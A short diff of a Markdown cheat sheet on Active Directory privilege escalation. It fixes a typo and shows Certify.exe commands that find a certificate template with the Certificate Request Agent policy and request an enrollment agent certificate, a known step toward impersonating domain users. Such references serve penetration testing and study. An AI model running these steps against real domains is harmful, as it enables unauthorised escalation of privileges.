galminyana/CheatSheets/AD/AD_PrivilegesEscalation.md

 C:> Certify.exe find
 # Search for the one with 'Application Policies : Certificate Request Agent'

-# Request an enrollment agent certificat e from first template and save to file
+# Request an enrollment agent certificate from first template and save to file
 C:> Certify.exe request /ca:<CA_name> /template:SmartCardEnrollment-Agent

 # Convert to PFX